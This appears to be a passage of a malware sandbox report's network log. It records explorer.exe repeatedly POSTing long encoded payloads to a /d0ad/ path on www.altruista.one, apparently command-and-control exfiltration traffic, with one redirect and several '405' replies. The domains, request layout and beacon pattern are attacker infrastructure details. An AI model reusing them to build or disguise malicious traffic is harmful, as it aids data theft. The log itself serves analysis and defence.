Oct 26, 2022 13:20:30.612739086 CEST	1984	IN	HTTP/1.1 301 Moved Permanently date: Wed, 26 Oct 2022 11:20:30 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked server: Apache x-powered-by: PHP/8.0 set-cookie: uncode_privacy[consent_types]=%5B%5D; expires=Thu, 26-Oct-2023 11:20:30 GMT; Max-Age=31536000; path=/; SameSite=Strict expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: http://rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 x-iplb-request-id: 66818F25:C30E_335BECC1:0050_635917FE_9A47:2EB77 x-iplb-instance: 32678 connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.11.20	49935	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:35.626868010 CEST	1985	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 45 6c 64 4c 76 55 77 38 31 77 37 53 6c 35 36 55 79 74 4c 69 42 71 28 6c 57 70 77 70 31 5f 46 6e 6b 75 54 78 7a 51 44 74 31 4d 31 53 30 62 6d 35 78 38 31 4c 44 52 7a 43 4f 34 61 47 37 57 57 76 47 36 52 5a 50 4b 41 5f 6f 31 53 4d 4a 39 68 50 62 39 42 71 4a 71 55 45 55 7a 76 75 49 33 4f 30 42 59 44 6a 36 58 63 4f 42 52 4f 76 31 58 55 65 58 73 47 37 31 33 44 72 71 41 41 75 44 52 75 4f 6e 41 44 34 4a 6b 28 30 57 4a 39 41 4a 50 6a 43 67 4e 37 45 41 37 35 63 67 4b 4b 37 48 56 54 62 4f 75 36 56 46 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=hohSZ-gLHRo-EldLvUw81w7Sl56UytLiBq(lWpwp1_FnkuTxzQDt1M1S0bm5x81LDRzCO4aG7WWvG6RZPKA_o1SMJ9hPb9BqJqUEUzvuI3O0BYDj6XcOBROv1XUeXsG713DrqAAuDRuOnAD4Jk(0WJ9AJPjCgN7EA75cgKK7HVTbOu6VFQ).
Oct 26, 2022 13:20:35.641061068 CEST	1985	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:20:35 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.11.20	49937	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:37.658579111 CEST	1987	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 46 42 68 4c 75 33 59 38 39 77 37 56 35 70 36 55 34 4e 4c 35 42 71 6a 6c 57 6f 45 41 79 4a 39 6e 6c 50 44 78 79 53 6e 74 32 4d 31 53 73 72 6d 32 31 38 31 51 44 52 75 33 4f 39 61 47 37 57 43 76 48 4d 74 5a 59 4b 42 70 6d 56 53 50 65 4e 68 43 66 39 42 67 4a 71 51 2d 55 33 7a 75 4a 47 69 30 47 64 76 6a 77 6a 6f 4e 46 78 50 6b 38 33 55 5a 46 73 47 39 31 33 47 57 71 43 51 45 41 69 79 4f 6d 67 6a 34 49 6b 28 37 4e 70 39 48 4c 50 69 54 78 59 53 53 4d 4c 42 56 30 36 75 6d 42 56 53 79 59 4b 37 6b 57 51 45 4d 71 71 67 4d 63 6a 35 50 31 6b 35 6a 6a 79 41 45 38 4e 33 56 74 55 57 68 4f 4b 75 65 6f 68 39 70 4e 78 45 66 72 30 34 2d 6d 6d 67 4d 42 75 4b 51 7a 70 30 42 50 72 73 6e 58 55 4e 6f 64 59 37 4d 70 75 65 6f 4b 47 32 49 72 57 71 49 75 2d 72 32 32 43 43 5f 6d 58 57 30 36 66 31 48 45 6b 76 6a 67 53 54 6b 4b 6b 45 69 4d 49 33 6b 54 30 38 51 6d 54 4d 43 74 44 76 6f 51 32 56 34 63 39 7e 54 32 39 6b 64 43 34 72 72 55 34 50 4b 73 6b 67 52 41 77 51 47 4c 62 74 55 42 37 4b 57 4b 46 34 63 45 74 77 63 75 77 70 4e 55 66 4d 34 71 56 71 6e 61 6b 50 71 56 38 59 71 41 6e 64 33 56 6c 65 42 4d 72 4f 6f 4b 48 58 79 37 31 61 61 41 77 6d 6d 54 6b 45 58 43 31 4d 6d 36 65 46 51 71 44 6d 4e 76 45 4d 67 63 69 34 42 51 6e 34 54 7a 4b 61 2d 50 56 78 4d 42 73 46 6e 49 4f 39 76 39 58 56 2d 79 43 43 6d 66 34 63 66 65 39 47 72 4d 4d 44 74 51 47 28 66 7a 4b 79 6f 57 61 32 44 50 77 68 54 58 53 4a 49 30 77 44 4d 58 7a 61 6e 63 55 4f 38 56 50 64 70 33 37 48 4c 4f 76 65 75 30 4e 4e 79 6b 32 4d 65 28 38 4a 50 42 67 66 4d 66 74 4a 32 62 44 41 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=hohSZ-gLHRo-FBhLu3Y89w7V5p6U4NL5BqjlWoEAyJ9nlPDxySnt2M1Ssrm2181QDRu3O9aG7WCvHMtZYKBpmVSPeNhCf9BgJqQ-U3zuJGi0GdvjwjoNFxPk83UZFsG913GWqCQEAiyOmgj4Ik(7Np9HLPiTxYSSMLBV06umBVSyYK7kWQEMqqgMcj5P1k5jjyAE8N3VtUWhOKueoh9pNxEfr04-mmgMBuKQzp0BPrsnXUNodY7MpueoKG2IrWqIu-r22CC_mXW06f1HEkvjgSTkKkEiMI3kT08QmTMCtDvoQ2V4c9~T29kdC4rrU4PKskgRAwQGLbtUB7KWKF4cEtwcuwpNUfM4qVqnakPqV8YqAnd3VleBMrOoKHXy71aaAwmmTkEXC1Mm6eFQqDmNvEMgci4BQn4TzKa-PVxMBsFnIO9v9XV-yCCmf4cfe9GrMMDtQG(fzKyoWa2DPwhTXSJI0wDMXzancUO8VPdp37HLOveu0NNyk2Me(8JPBgfMftJ2bDA.
Oct 26, 2022 13:20:37.672671080 CEST	1987	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:20:37 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.11.20	49938	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:39.689028978 CEST	1992	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 46 42 68 4c 75 33 59 38 39 77 37 56 35 70 36 55 34 4e 4c 35 42 71 6a 6c 57 6f 45 41 79 4a 31 6e 6c 39 62 78 77 7a 6e 74 33 4d 31 53 79 62 6d 31 31 38 30 41 44 52 32 7a 4f 39 6d 38 37 54 47 76 47 62 68 5a 59 5a 70 70 32 46 53 4f 43 64 68 41 62 39 42 30 4a 71 56 6b 55 32 58 59 49 33 57 30 42 61 4c 6a 36 79 6f 4f 4a 42 4f 76 38 33 55 56 54 73 48 49 31 32 58 64 71 43 63 45 41 67 47 4f 6d 54 62 34 4b 33 6e 37 56 4a 39 45 59 76 6a 64 6f 49 53 6a 4d 4c 55 6b 30 36 75 59 42 55 57 79 59 4e 50 6b 58 54 38 50 6b 71 67 4d 56 44 35 49 78 6b 30 71 6a 79 73 63 38 4f 72 56 74 54 71 68 4f 71 75 65 6a 6c 68 71 4b 52 45 6a 76 30 34 70 77 6d 73 55 42 75 4f 45 7a 72 34 42 50 37 34 6e 52 6a 5a 6f 65 35 37 4d 71 4f 66 4f 41 6d 32 62 69 32 72 4a 75 2d 37 55 32 44 69 4a 6d 58 79 30 31 66 56 48 56 78 62 67 6e 79 54 6d 50 6b 46 34 49 49 72 67 54 30 73 63 6d 54 4e 66 74 43 37 6f 54 43 52 34 64 5f 57 53 79 74 6b 61 4f 59 72 45 61 59 4c 41 73 6b 39 53 41 78 59 6f 4c 59 68 55 41 62 4b 57 50 6d 51 66 4f 64 77 58 6e 51 6f 52 51 66 4d 6a 71 56 6d 64 61 67 58 51 57 4d 38 71 41 58 74 33 52 31 65 4f 4a 4c 4f 73 54 58 58 30 28 31 61 61 41 77 71 79 54 6b 49 58 44 41 49 6d 6f 63 4e 51 76 51 4f 4e 74 45 4d 69 63 69 34 51 51 6e 38 34 7a 4c 4f 41 50 56 42 79 42 75 70 6e 4e 4c 52 76 34 57 56 39 6a 69 44 73 62 34 63 79 47 64 4b 38 4d 4d 66 6c 51 47 50 6c 79 39 4b 6f 58 61 6d 44 59 51 68 53 53 79 4a 53 6b 67 43 55 54 79 6d 46 63 55 53 73 56 50 35 41 33 34 33 4c 4e 4b 6e 53 76 4f 52 49 79 47 45 32 31 37 4e 70 43 6d 4c 6b 4c 59 46 44 49 6c 45 71 69 4f 77 43 65 65 48 77 77 46 69 48 61 34 39 6f 74 4c 45 4e 71 52 79 35 31 74 6a 61 38 4c 6f 72 69 33 59 32 42 58 28 41 41 30 31 6e 54 59 72 57 79 32 42 70 38 35 6b 61 34 37 58 6c 55 5f 52 59 67 74 67 57 51 61 4e 43 46 69 51 4b 50 56 6a 47 52 51 79 50 50 57 6d 36 59 71 37 6a 32 70 76 57 47 77 72 35 57 71 72 4f 45 72 4a 2d 56 43 6a 42 6e 33 41 51 48 77 74 54 79 58 71 76 39 55 72 6e 55 51 6f 73 5a 49 57 4e 66 42 58 34 73 38 47 79 32 65 4d 75 79 71 65 31 31 49 75 39 43 75 39 77 66 36 77 56 70 47 43 75 31 51 71 54 5a 6f 52 51 39 71 78 6c 33 50 7a 54 47 63 49 57 72 4b 68 76 33 45 34 64 78 68 5a 6b 51 66 48 37 7e 66 52 54 74 30 78 33 67 35 31 65 37 59 4c 65 4d 71 4c 34 6b 71 76 65 41 71 69 75 6e 59 49 7a 54 78 48 6e 67 61 48 71 6b 48 32 6c 6a 72 51 4b 65 41 44 67 6e 57 55 50 45 57 76 68 63 57 45 75 57 4b 36 69 64 4e 47 36 53 65 7e 7a 43 76 6a 78 45 52 6d 4e 64 55 48 38 4f 4a 4b 50 32 34 37 6d 4c 31 44 70 48 49 55 43 63 6f 66 4d 42 52 34 4a 51 64 42 7a 49 6f 67 54 67 35 45 38 6e 41 33 32 4b 67 4e 6d 78 47 79 57 71 4b 72 58 53 74 42 4d 51 6a 77 35 31 4e 49 57 28 58 62 38 52 36 54 4b 32 52 28 55 6c 43 72 79 74 69 6b 79 74 67 64 61 69 48 42 4e 65 4b 46 70 6e 55 78 4a 57 42 62 5a 76 32 45 6f 45 51 51 76 47 45 62 67 64 6e 66 31 68 31 66 6b 55 38 70 53 30 4f 38 73 79 4d 53 35 74 33 6d 78 69 44 48 77 53 50 46 6b 4e 74 5a 76 71 53 53 69 49 75 6f 74 77 51 58 42 56 50 58 34 58 57 59 70 4e 4b 28 43 35 2d 74 79 71 49 75 6d 44 68 70 4a 6c 74 52 57 7e 78 78 6b 44 38 64 33 52 6a 6f 47 6c 57 6a 68 30 55 48 33 4a 66 42 76 50 79 4d 44 6e 32 72 74 37 47 34 68 72 61 33 43 33 54 70 6f 46 71 70 36 65 6e 77 4e 61 6a 51 48 61 46 51 79 79 30 46 67 34 71 47 44 38 4f 38 67 58 37 33 46 59 75 6c 39 69 34 38 77 79 43 71 4e 51 51 33 62 75 39 64 77 6f 31 4b 69 4e 43 56 43 77 30 62 49 46 6d 67 5a 35 46 49 6a 45 4f 6f 79 76 47 70 33 4e 55 6f 71 32 45 62 33 72 47 4d 53 39 77 57 53 56 37 52 6d 55 71 35 74 41 4e 5a 5f 31 64 31 72 48 4f 42 33 4f 51 74 66 52 43 77 39 36 65 61 41 46 47 70 50 54 31 59 6e 48 55 34 65 4e 74 54 76 68 51 64 66 31 6f 4e 79 61 37 50 54 77 32 49 77 5a 6e 47 35 72 53 57 66 35 69 65 72 34 30 56 53 38 47 7a 56 74 51 6e 4d 72 4b 65 4b 64 44 50 6b 4e 45 53 45 76 72 56 5a 33 66 6d 68 63 66 66 6e 61 54 42 6f 46 6f 45 55 75 54 35 6e 75 63 72 6f 41 50 72 66 52 31 4b 39 50 72 61 54 51 6e 36 6b 68 64 59 6b 72 78 7e 75 35 35 72 6f 70 38 36 2d 33 41 39 45 48 70 4e 42 50 56 6a 63 67 69 34 46 4b 34 6b 2d 6a 47 37 54 32 5a 30 71 75 6b 70 45 61 61 6f 33 66 55 32 4e 66 7a 4a 34 7a 43 44 4c 33 79 28 4f 64 4c 65 Data Ascii: jXu=hohSZ-gLHRo-FBhLu3Y89w7V5p6U4NL5BqjlWoEAyJ1nl9bxwznt3M1Sybm1180ADR2zO9m87TGvGbhZYZpp2FSOCdhAb9B0JqVkU2XYI3W0BaLj6yoOJBOv83UVTsHI12XdqCcEAgGOmTb4K3n7VJ9EYvjdoISjMLUk06uYBUWyYNPkXT8PkqgMVD5Ixk0qjysc8OrVtTqhOquejlhqKREjv04pwmsUBuOEzr4BP74nRjZoe57MqOfOAm2bi2rJu-7U2DiJmXy01fVHVxbgnyTmPkF4IIrgT0scmTNftC7oTCR4d_WSytkaOYrEaYLAsk9SAxYoLYhUAbKWPmQfOdwXnQoRQfMjqVmdagXQWM8qAXt3R1eOJLOsTXX0(1aaAwqyTkIXDAImocNQvQONtEMici4QQn84zLOAPVByBupnNLRv4WV9jiDsb4cyGdK8MMflQGPly9KoXamDYQhSSyJSkgCUTymFcUSsVP5A343LNKnSvORIyGE217NpCmLkLYFDIlEqiOwCeeHwwFiHa49otLENqRy51tja8Lori3Y2BX(AA01nTYrWy2Bp85ka47XlU_RYgtgWQaNCFiQKPVjGRQyPPWm6Yq7j2pvWGwr5WqrOErJ-VCjBn3AQHwtTyXqv9UrnUQosZIWNfBX4s8Gy2eMuyqe11Iu9Cu9wf6wVpGCu1QqTZoRQ9qxl3PzTGcIWrKhv3E4dxhZkQfH7~fRTt0x3g51e7YLeMqL4kqveAqiunYIzTxHngaHqkH2ljrQKeADgnWUPEWvhcWEuWK6idNG6Se~zCvjxERmNdUH8OJKP247mL1DpHIUCcofMBR4JQdBzIogTg5E8nA32KgNmxGyWqKrXStBMQjw51NIW(Xb8R6TK2R(UlCrytikytgdaiHBNeKFpnUxJWBbZv2EoEQQvGEbgdnf1h1fkU8pS0O8syMS5t3mxiDHwSPFkNtZvqSSiIuotwQXBVPX4XWYpNK(C5-tyqIumDhpJltRW~xxkD8d3RjoGlWjh0UH3JfBvPyMDn2rt7G4hra3C3TpoFqp6enwNajQHaFQyy0Fg4qGD8O8gX73FYul9i48wyCqNQQ3bu9dwo1KiNCVCw0bIFmgZ5FIjEOoyvGp3NUoq2Eb3rGMS9wWSV7RmUq5tANZ_1d1rHOB3OQtfRCw96eaAFGpPT1YnHU4eNtTvhQdf1oNya7PTw2IwZnG5rSWf5ier40VS8GzVtQnMrKeKdDPkNESEvrVZ3fmhcffnaTBoFoEUuT5nucroAPrfR1K9PraTQn6khdYkrx~u55rop86-3A9EHpNBPVjcgi4FK4k-jG7T2Z0qukpEaao3fU2NfzJ4zCDL3y(OdLewK1xik23umNEgsizI6rJjoL68Sq~-q5TLL2bcARGmJTn3n-YEePLgDzjd525_1ztmYQEJFnJ87Lz0TSZwqP(Lks3VB5(FMbH7~uMbwRKl7z4smVnKsr6xZpFVyjXvsLOW4FXW5JW8WZp6z8teq431MD2_sFmzC2mOJcq1KJ3_ZX5M~JB0d4woLQLbdGXymXHDs6eos2KCCGxzDYXf6sGJQrhT99tvsKApZ223pO(9M5r6L11e8hIlsmXlJM~gndB6Jw7H~B1mBJDjFHtcrDP6vrMGH3j-HRO0s3FW2BKGf3d-cl5UjvDCjRtv4a4YWqJ0Ui3H(CjvANbMBZZ8PmxQua47Hu0POnDLl3R0IXBfAgo-LsoEC5WeTMPDpHGm8j9WEdYb0NCsE9kgB9Gf3JjhMGLDb9HSNjPIL17AkU2mBxVoNNRLjgWMYlW0kXwqKERgpjIXh4l_VU95hszZnkVLLTfMVdoYvzMgk_~l8kpcjS~T52qI47zYFjw9aKPhbgGgQd4rebtDMujwrZdMRDz5(7rc8y7-z_ItNBOizK(XYwWEAZxR0oFlFuj6FlGmWSnTnM1TgHCAskcj5wHh9mU22iWnoDE7w6zPDQyox6FRL1fMyLsVMGd_ySnuP2GW9c94m44m9HqddREQohES53yWuZrnHgt_jNzFb2N_ii3qZAfJCcT9lA6TURs_qvqfqBNT8HCSXj39~YJELVHvqmUrS8k0HKO5UbfpyPlnKoUbAa(IDH7BZxWtQpgrHMzIG4cERg6vZxEgdeLDJfiQQ1gZWaYg0AMC0fTgIpAP3x6yjn3PQMA45tebQtFQujqWUZ2bLnuna0s9I5o0EO5SMNuGpb1tN_JLOFGHM1Rc~94WGDmGxoSGnwg5xx6VOwrKr-8z0uvjS9dqS59YGclIYHFi4mJB6shdoTgPXUC8LLDDcx(y4p9gV1d0L5bHR6eaN1mHeSIAXLbEVGN9seRYIYRKTGetqF2jX5RcAmT_JZm1nn67xLAG0aXLKcHL8U6i37Z9gj7pEwmtwpjUIWsuEn0JsljI~TeXS9squlBxKWwWDnd6v4gq~eqPZKY-ANEyZQo-I-FbP13ImiUDLbf5bZ3YJt71CmkGSJnlWbI9sWto8o5xKmQbPp3M3758NI8rbZU2JHn4zXm57TTayUA9tiVT3FDjRLBZ9kN5NQGa~wMOhxobsFMpjVc5K5t_ExykO7h9W0B_EcZ0uCKIu7mHE4wwLBFAleCNgEIhoeTZc89yXx8wFMuXyKroDaXXlpmfeuUIA-5E~nw-gcC0ZRgOv2FHH8wmSbtny441mJCKoNZo8XdcO6gzI4FD1HOiaAJlb4InktwpeT7hwJLpGLsW8BeY4nOqURTtcHYtwctbeuF5(YQSJsBjmT~gSWBClK(JJVhTDnOl64Mpys5tW9Fm4UdLh2TdYB(dSRozoh~gGgJ48tDs6qbBoa0Wba0RXTQo63CRfeFGpYeF6atTJrpTMdf4kbAP4Fo5vLH_t4RQvZQ9FWcxAx7K0QoQHoeXXug2l9ED5WqqNWRrx8FABuTRr4t-XuB1pGh7zmphMyZr0Kz1bn1l~nKxo_VSTFAxAH9ER3c2YYMyRmavj6mFAanNzAovL7wvUAPmW6gl2wcoYVx_FBgId-eJifd2gzfpQeuXznD-ZziS7rZmIt84Ysc4ddY2NlBtByzk3q1GphjlLUVfP4ErwWoRRuM71zlpxIR4LiMM0UPXjDrN7qGGZgZ0pGtEKw1lb6Dz1n1ivU52Yr2aFrelYFJ-7ZM3(Hxgeyqyh4v53OMOKTfQjFt_lgWYCeUKhflTZKYp~Rpri7CWf9ANblsiuS(mLwOoh3B3xbbpDktmg9Nl4IDzeyAFRHrsJpiI7skfSJhax96wZ0Tkav2fPtmRuWdOwQXz~MDr0HFKLzg3TdX3nCm6nqRBwlqPxjs3f1D7jevZa6QkKZzMYUKdpCVRYjdceBj12ByfUydKUyhLi3S1tFkE9d1dbRuUNE97TsqmUkMJ7aqeIecdDCpPs19HTmn2UInHGsPiKCKN(g3YOxVcdbMFO1JuGojOabObVCRHLNtMZGMI74fWLB8mSVMGabepn
Oct 26, 2022 13:20:39.689111948 CEST	2000	OUT	Data Raw: 5f 6e 45 30 50 72 59 6f 70 53 4a 71 79 72 39 31 31 79 41 30 7a 50 44 52 43 58 62 53 30 48 48 48 7a 49 4a 55 47 65 72 65 34 4e 35 67 44 58 49 41 56 54 55 74 38 38 53 44 67 36 32 46 6f 74 38 49 4f 64 76 59 49 44 76 6b 6b 6b 4e 28 4a 62 6c 34 63 37 Data Ascii: _nE0PrYopSJqyr911yA0zPDRCXbS0HHHzIJUGere4N5gDXIAVTUt88SDg62Fot8IOdvYIDvkkkN(Jbl4c7IB-mZiHo3aClPlUO7r21Fl0Rm0oIUyc32pDvqxh8-dDVG28MUlk(VmfqNCYrA57xARwfVI8uTsbsgP0x4xRlBl8YDiumfytiB7oW36JMt~Ut2eQx5OBb0uM2XSUQGXRlV2YngVgT3J-5QaGcjvmKvb_Uh5EIzQDVe
Oct 26, 2022 13:20:39.701447010 CEST	2006	OUT	Data Raw: 74 71 77 47 6e 62 4b 6e 30 76 6d 7a 75 4b 2d 79 71 64 41 46 72 45 57 6e 54 64 53 4e 45 46 4d 47 5a 76 32 6c 71 48 46 42 6a 69 30 4c 33 37 79 52 6f 4f 62 64 59 46 43 42 51 51 36 4a 4c 73 75 79 68 62 36 54 67 55 2d 68 56 66 54 72 45 6b 66 74 78 41 Data Ascii: tqwGnbKn0vmzuK-yqdAFrEWnTdSNEFMGZv2lqHFBji0L37yRoObdYFCBQQ6JLsuyhb6TgU-hVfTrEkftxAU8kv5c_AJcowRA8mJkHbatHeiFeTH~OaMAzRx1KO1y_VHr-p5u5NSXf~eUF9Tte555Er81P8yU7lU04jODrXFW7l5a_ngS3CsDK0f1mh8rjIT9h07Ac61vBRaFbpjNf7OuNOcZONfT4ysNkyOaSzE8L5svwGBIqjd
Oct 26, 2022 13:20:39.701582909 CEST	2008	OUT	Data Raw: 41 35 4e 45 6d 55 45 30 6c 54 54 54 6a 58 6e 67 62 7e 2d 77 42 28 32 54 6e 66 6b 32 30 71 4f 46 6a 57 6e 58 6d 65 37 79 6d 5a 69 44 2d 45 5f 61 4e 39 54 76 57 32 49 36 6a 78 75 57 32 32 38 4c 4e 72 31 65 77 6c 5a 65 4e 69 34 4e 73 69 4c 75 37 68 Data Ascii: A5NEmUE0lTTTjXngb~-wB(2Tnfk20qOFjWnXme7ymZiD-E_aN9TvW2I6jxuW228LNr1ewlZeNi4NsiLu7hp99cJ~dRmTkZo1JEPkJFq70KVwAkR95nxzmkJi7wuzHsck35Erqrvj5NdlthPAikbIBTVxTqEVb752NF-XNVFZANztQ4SUuABdBgbaxPAPRcSr7~OuoFpfmdJ5eiWe1~jt6LDr4GDwzDAGDK9p3couWCS6SJYrllj
Oct 26, 2022 13:20:39.701765060 CEST	2024	OUT	Data Raw: 65 6b 68 7a 6b 6f 47 6a 46 77 72 6a 63 63 54 6e 55 77 37 49 6e 4c 41 5a 74 45 52 69 70 4a 68 33 6d 75 5a 38 78 54 74 31 4a 73 7a 55 43 68 6f 61 58 46 4c 48 34 63 55 76 31 6e 51 61 7a 4b 55 55 62 37 4f 35 4b 63 50 62 6f 71 6c 6d 7a 78 36 75 5f 6f Data Ascii: ekhzkoGjFwrjccTnUw7InLAZtERipJh3muZ8xTt1JszUChoaXFLH4cUv1nQazKUUb7O5KcPboqlmzx6u_ooG9wLx9N5ZhCFct0mZmPIdTIy6zEu9e8rZp69xruAMZF55eIAkYMPlnDZH26BpwPgssLApqTvQKVVfSGXebPwc6L8lzS58N6CKK9Doq6LyrT8DPOFXiuIrAYhmwgXp5id9sdW7moahCZ9atepklKTlRrU2u79Rtwd
Oct 26, 2022 13:20:39.702136993 CEST	2026	OUT	Data Raw: 46 6e 35 6d 4c 66 79 76 5f 62 46 57 75 32 54 61 47 79 6a 6f 70 7e 53 4b 53 61 38 41 6a 63 36 7e 65 47 69 59 4e 47 4c 75 36 6e 49 70 6b 58 38 67 6a 51 63 66 45 4c 51 31 36 6f 4d 4a 7a 53 58 35 35 74 35 65 46 61 44 77 73 71 2d 68 35 4c 63 75 57 78 Data Ascii: Fn5mLfyv_bFWu2TaGyjop~SKSa8Ajc6~eGiYNGLu6nIpkX8gjQcfELQ16oMJzSX55t5eFaDwsq-h5LcuWxhw9cEKYYruSsFXzjjreOSWqGmfg0GujQbaQHXNoiSIRFlkb8h75UgqbsdVWkm503OBzEpAoTFWqu3x73IqtVgpWLcpnbJVQtf2Fuss1PW(F1uWj~Bk9twss3a6corAkKZagpU9SK4~qYdtYsF(96lfCIkfnl42ACS
Oct 26, 2022 13:20:39.703324080 CEST	2026	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:20:39 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:20:39.713843107 CEST	2029	OUT	Data Raw: 62 68 7a 42 36 33 72 36 6a 54 50 45 30 43 4f 66 63 4e 31 52 54 51 62 6b 6e 54 45 56 6f 4c 6a 62 4b 65 54 33 43 61 75 57 76 79 46 34 59 73 69 56 47 6f 57 73 42 59 7a 7e 33 6c 70 4f 52 43 33 62 42 72 4d 5a 78 50 58 67 77 78 46 31 68 73 61 68 71 47 Data Ascii: bhzB63r6jTPE0COfcN1RTQbknTEVoLjbKeT3CauWvyF4YsiVGoWsBYz~3lpORC3bBrMZxPXgwxF1hsahqGgqyBa2kebkRo7siqcxZmCLYj4ZZwGcaXHzHjnvcmrqvsOmIDkvOGvOqqFqVzYb8veg5i8jx2xmy2p2C(A2DaqbO0l(y5tEW0SJXwPpLaVCZX5dIETgOQr28EQh5kYBxNNSZqB5_Qfq6kBm-Sk2IRuZmBaF8z6TkNR
